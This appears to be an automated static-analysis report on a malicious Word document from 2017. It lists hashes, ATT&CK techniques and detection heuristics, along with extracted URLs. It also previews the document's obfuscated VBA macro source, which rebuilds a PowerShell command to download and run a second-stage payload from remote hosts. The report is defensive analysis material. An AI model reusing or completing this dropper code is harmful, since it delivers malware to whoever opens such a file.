Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 67c3c3a72115570e…

MALICIOUS

Office (OLE)

167.0 KB Created: 2017-11-29 08:04:00 Authoring application: Microsoft Office Word First seen: 2017-12-08
MD5: 2420fa5969f842b077f04f2f22e4669d SHA-1: ed992fa39c602d8aef064b3bd25c8d46f1fb95d0 SHA-256: 67c3c3a72115570e6f6a609dbf6f115aa2031fa1ef540742e3ece81776cbe72a
Risk Score: 242

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample contains critical heuristics indicating the presence of VBA macros with auto-execution and Shell() calls, strongly suggesting malicious intent. The VBA script attempts to download and execute a second-stage payload from the reconstructed URL 'http://s40J+4oINRqanRoRwzj6lJWrJ7l40J+40JKht40J+40Jt40J+40'+'Jp://40J+40Jta40J+40Jswines.9S1+9KdIzutuOYmWcj4XD239k8FR'. This indicates downloader or dropper functionality, commonly associated with malware delivery.

Heuristics 7

  • ClamAV: Doc.Macro.Obfuscation-6387400-0 [critical; CLAMAV_DETECTION]
    ClamAV detected this file as malware: Doc.Macro.Obfuscation-6387400-0
  • VBA macros detected [medium; 3 related findings; OLE_VBA_MACROS]
    Document contains VBA macro code
  • Shell() call in VBA [critical; OLE_VBA_SHELL]
    Shell() call in VBA
  • AutoOpen macro [high; OLE_VBA_AUTOOPEN]
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens [high; OLE_VBA_PCODE_AUTOEXEC_EXEC]
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium; OLE_LEGACY_WORDBASIC_AUTOEXEC]
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info; EMBEDDED_URL]
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    Extracted URLs (with the channel that reached each):
    • http://s40J+4oINRqanRoRwzj6� [In document text (OLE body)]
    • http://www40J+40J.avc40J [In document text (OLE body)]
    • http://r40J+40Ja40J+VQXXrUmpzMKK� [In document text (OLE body)]
    • http://w�ww$0.avc� [In document text (OLE body)]
    • http://s40J+4oINRqanRoRwzj6 [In document text (OLE body)]
    • http://r40J+40Ja40J+VQXXrUmpzMKK [In document text (OLE body)]
    • http://schemas.openxmlformats.org/drawingml/2006/main [In document text (OLE body)]

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 84550 bytes
SHA-256: fc8c97827c2fa9c30651b2653c83b3ab7a7fcb5401ce3c2a78ae9f823c946b6b
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "EbMUjGwtI"
Function hPHzlQDnH()
MmSGYE = Array(StrReverse("iHFCqMtQKj"), StrReverse("hmsZZtJuzs"), StrReverse("tMqBOMcUBI"), StrReverse("sUtjjiRnAo"), StrReverse("mJzwFTMVuz"), StrReverse("BSFTXRQEoi"), StrReverse("jZOCqNsIpr"), StrReverse("bWtLFjPsvu"))
ZZaXduZiVm = Mid("lJWrJ 7l40J+40JKht40J+40Jt40J+40'+'Jp://40J+40Jta40J+40Jswines.9S1+9'+KdIzutuOYmWcj4XD239k8FR", 5, 66)
vwXTutw = Array(StrReverse("CdrmNVQMzk"), StrReverse("PjnVtwwikH"), StrReverse("KzEllzftXI"), StrReverse("jiJinGstnP"), StrReverse("QzlzZUVYnU"), StrReverse("RXosTEZFBO"), StrReverse("pWprAjaIhm"), StrReverse("GFuUrLMELR"))
zzzDA = Array(StrReverse("zHZDGaOaMS"), StrReverse("RNwVENvvHr"), StrReverse("bEfDWfYuNn"), StrReverse("CYItibzLwQ"), StrReverse("wRwWZNXXGs"), StrReverse("oTkESvbWha"), StrReverse("BUNYQtFFqd"), StrReverse("NjzrsKIJdI"))
AtDLmO = Array(StrReverse("zqPwCCPvYc"), StrReverse("hUDfUKJLJw"), StrReverse("BAaPQvnfXt"), StrReverse("CuLvuXfvQv"), StrReverse("RojajdIRDQ"), StrReverse("zbPDtwQzjH"), StrReverse("OjYfZnJHlz"), StrReverse("iNvOfNUzjn"))
zcVwkikof = Mid("E4mOXjYualN1CjI4ADaL5Rj9Sw]39) | . ( $VERBosEPrEfEReNCe.TOsTRiNG()[1,3]+'X'-jOiN'')j1k", 27, 57)
kRkpt = Array(StrReverse("IAoUwioDaj"), StrReverse("zcdVOiDXFf"), StrReverse("ISjdfEUsLI"), StrReverse("mStYSBjsZi"), StrReverse("FBiHdkFddO"), StrReverse("GkDzzqTLpt"), StrReverse("OvsSzjjEDN"), StrReverse("wLzXaGnZzu"))
aAwOmuONBR = Array(StrReverse("mVcGvaiIBw"), StrReverse("GfPJjhPABt"), StrReverse("UAjFlkjAXj"), StrReverse("dQQtUtHRkz"), StrReverse("IAGoqwzmiw"), StrReverse("zUwqSmoWVL"), StrReverse("udkVTqPWom"), StrReverse("awPBkTusPm"))
MvwzH = Array(StrReverse("wOABwiZriO"), StrReverse("DoJCHBVVRY"), StrReverse("MoqqkzMMnI"), StrReverse("fGHTnpVSdH"), StrReverse("jmjlBfvvDa"), StrReverse("YKYqWHXJQw"), StrReverse("WNDWjzhqOR"), StrReverse("jDrKpZFFoF"))
omUAG = Mid("G7OtdKEI0c7V6n40JDrHFDJIqn6nVDlCAc", 15, 3)
CljCPzpjidj = Array(StrReverse("mtSZiISZah"), StrReverse("FkwZFfQkVA"), StrReverse("jbzwYwEwGz"), StrReverse("swGiZALLmK"), StrReverse("XpvHhpCqwE"), StrReverse("CJWPDKwWBk"), StrReverse("DVTapIdNAF"), StrReverse("UFzKcufqOi"))
nsfWQ = Array(StrReverse("BRIMkUhRwf"), StrReverse("SLBflViMCE"), StrReverse("zFjluVSOAw"), StrReverse("CSULzFErmO"), StrReverse("PQtizUBMZT"), StrReverse("rsCkHwkWRO"), StrReverse("BTQAdzrqhj"), StrReverse("RraoohLzma"))
miTtKrWfCS = Array(StrReverse("iNmDsTuzvl"), StrReverse("SjEqaiRISd"), StrReverse("mjaKYQUGXZ"), StrReverse("kfPLWfOklw"), StrReverse("oAmrwmMHMh"), StrReverse("EQdDjwncfb"), StrReverse("wnaVBnRsTv"), StrReverse("ThWWplzjLm"))
zKwjEVijh = Mid("RMX2iT8NB5jJjjk1d5q9S1).r'+'EpLAcE(9S140J9S1,[sTRing][ChaR]39) )') -REPlaCE([chAr]100+[chAr]53+[chAr]113),[chAr]124 -CrePLACE([chAr]111+[chAr]82+[chAr]67),[chAr]36-CrePLACE'9S1',[chArfuj", 16, 168)
kvjVfEdXjw = Array(StrReverse("UGphFKPkEA"), StrReverse("UhZXMwAtFz"), StrReverse("dLisCAROvZ"), StrReverse("lmkruvdjvT"), StrReverse("jGmhLjRDbr"), StrReverse("hSsmwIcwiE"), StrReverse("sBoiPizhcR"), StrReverse("TQwmPWYwhS"))
JimcXUj = Array(StrReverse("EMupUTBLfX"), StrReverse("rlFJzAZQpL"), StrReverse("UTnRNXuHOu"), StrReverse("BDRsXmtkBi"), StrReverse("lFNwDibMZp"), StrReverse("MjtzRlYdcw"), StrReverse("ZuzkVnUNmK"), StrReverse("GpPHaPGrNf"))
LWUow = Array(StrReverse("qFnqvBQRfQ"), StrReverse("luiqwFKOtO"), StrReverse("oUHhEXCqLF"), StrReverse("HjzzUwkBcF"), StrReverse("QkjnfkBldh"), StrReverse("BNjFEVwFlY"), StrReverse("zaFaJEukVw"), StrReverse("UIlozEoTCU"))
jIoaP = Mid("X5tw0Jalon-gr40J+49S1+9S10Ja409S1+9S1J+40Jz'+'ia.40J+40J'+'ru/Hq40J+40Jrp40J+40J/740J+40Jl40J+40J9S1+9S1K.Split40J+49S1Mumbp6", 5, 115)
FFXUKR = Array(StrReverse("whhZiUKRam"), StrReverse("OQIEIqIcaP"), StrReverse("ONaPiXQmZC"), StrReverse("ijPwzsMYBA"), StrReverse("dCmAvpjLwj"), StrReverse("HdQwRiGSqL"
... (truncated)